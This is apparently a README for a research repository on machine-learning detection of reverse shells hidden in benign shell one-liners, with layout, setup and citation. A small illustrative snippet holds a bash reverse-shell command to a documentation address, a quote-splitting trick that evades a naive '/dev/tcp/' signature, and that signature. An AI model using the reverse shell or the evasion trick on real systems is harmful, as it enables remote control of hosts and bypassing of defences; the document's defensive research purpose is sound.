This repository accompanies the paper:
“Robust Synthetic Data-Driven Detection of Living-Off-the-Land Reverse Shells”
It contains:
- a curated corpus of benign and malicious shell commands,
- data-augmentation and adversarial-example generators,
- a library of detection models (traditional ML, CNN/LSTM, Transformer, XGBoost, one-class),
- ablation studies on embedding size, dropout, tokenizer choice, and more,
- full adversarial-training, evasion, and poisoning pipelines,
- notebooks that reproduce every table and figure in the paper.
The overarching goal is to build detectors that remain robust when attackers hide reverse shells inside otherwise benign one-liner commands.
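To make the threat model concrete, here is a minimal sketch that is not taken from this repository. The helper names (`hide_payload`, `obfuscate`, `naive_detect`), the example commands, and the single-pattern signature are all hypothetical, and the address comes from a reserved documentation range. It illustrates why a literal signature is brittle: the same payload, appended to a benign one-liner and lightly obfuscated, no longer matches.

```python
import re

# Hypothetical examples for illustration only.
# 192.0.2.1 belongs to a reserved documentation address range.
BENIGN = "tar -czf backup.tar.gz /var/log"
REVERSE_SHELL = "bash -i >& /dev/tcp/192.0.2.1/4444 0>&1"

# A deliberately naive signature: flags the literal /dev/tcp/ redirection.
NAIVE_SIGNATURE = re.compile(r"/dev/tcp/")


def hide_payload(benign: str, payload: str) -> str:
    """Append a payload to a benign command so both run as one line."""
    return f"{benign}; {payload}"


def obfuscate(command: str) -> str:
    """Split the '/dev/tcp/' literal with empty quotes, which the shell strips."""
    return command.replace("/dev/tcp/", "/dev/t''cp/")


def naive_detect(command: str) -> bool:
    """Return True if the naive signature matches anywhere in the command."""
    return NAIVE_SIGNATURE.search(command) is not None


hidden = hide_payload(BENIGN, REVERSE_SHELL)
evasive = obfuscate(hidden)

print(naive_detect(BENIGN))   # False
print(naive_detect(hidden))   # True
print(naive_detect(evasive))  # False: the literal pattern no longer appears
```

The detectors in this repository are learned models rather than single patterns; the sketch only motivates why robustness to such manipulations matters.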
- Pre-trained models: https://huggingface.co/dtrizna/QuasarNix
- Dataset: https://huggingface.co/datasets/dtrizna/QuasarNix
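One possible way to fetch both repositories locally is sketched below. It assumes the `huggingface_hub` package is installed, which this README does not state, and the function name `download_quasarnix` is hypothetical. The file layout inside each snapshot is not described here, so inspect the returned directories before loading anything.

```python
# Assumption: the huggingface_hub package is available in the environment.
MODEL_REPO = "dtrizna/QuasarNix"
DATASET_REPO = "dtrizna/QuasarNix"


def download_quasarnix(cache_dir=None):
    """Download the model and dataset repositories and return their local paths.

    Requires network access. Nothing is assumed about the files inside
    each snapshot; the caller decides how to load them.
    """
    # Imported lazily so that defining the helper works without the package.
    from huggingface_hub import snapshot_download

    model_dir = snapshot_download(repo_id=MODEL_REPO, cache_dir=cache_dir)
    dataset_dir = snapshot_download(
        repo_id=DATASET_REPO, repo_type="dataset", cache_dir=cache_dir
    )
    return model_dir, dataset_dir
```

Calling `download_quasarnix()` returns two directory paths in the local Hugging Face cache.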
If you build on this work, please cite the paper:
@misc{trizna2024robustsyntheticdatadrivendetection,
  title={Robust Synthetic Data-Driven Detection of Living-Off-the-Land Reverse Shells},
  author={Dmitrijs Trizna and Luca Demetrio and Battista Biggio and Fabio Roli},
  year={2024},
  eprint={2402.18329},
  archivePrefix={arXiv},
  primaryClass={cs.CR},
  url={https://arxiv.org/abs/2402.18329},
}

- src/ – Core library
  • augmentation.py – rule-based and generative augmentations
  • evasion.py – white-box / black-box adversarial attacks
  • models.py – model definitions (CNN, LSTM, Transformer, XGBoost, …)
  • preprocessors.py, bpe/, tabular_utils.py – tokenisers & feature builders
- experiments/ – Scripts and notebooks used in the paper
  • ablation_*.py – ablation studies
  • adversarial_*.py – attack and defence pipelines
  • train_release_models.py – end-to-end training script
  • logs_*/ – TensorBoard runs, CSV metrics, and model checkpoints
- data/ – Signatures, sample datasets
  • signatures/ – Sigma rules generated by our evolutionary search
  • nix_shell/, powershell/ – raw command corpora
- img/ – Plots ready for publication.
- Create an isolated environment:
    uv venv  # creates a .venv directory (add --python 3.11 to choose a specific interpreter)
    source .venv/bin/activate
- Install all project dependencies declared in pyproject.toml:
    uv sync  # reads dependencies from pyproject.toml and installs them
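After setup, a quick sanity check can confirm that scripts run inside the environment rather than the system interpreter. The snippet below is a minimal sketch using only the standard library; the function names `in_virtualenv` and `environment_summary` are hypothetical and not part of this repository.

```python
import sys


def in_virtualenv() -> bool:
    """Return True when the running interpreter belongs to a virtual environment."""
    # Inside a venv, sys.prefix points at the environment directory,
    # while sys.base_prefix still points at the base installation.
    return sys.prefix != sys.base_prefix


def environment_summary() -> str:
    """Build a one-line description of the active interpreter."""
    version = ".".join(str(part) for part in sys.version_info[:3])
    kind = "virtual environment" if in_virtualenv() else "system interpreter"
    return f"Python {version} ({kind}) at {sys.prefix}"


print(environment_summary())
```

If the summary reports a system interpreter, the `.venv` environment has most likely not been activated in the current shell.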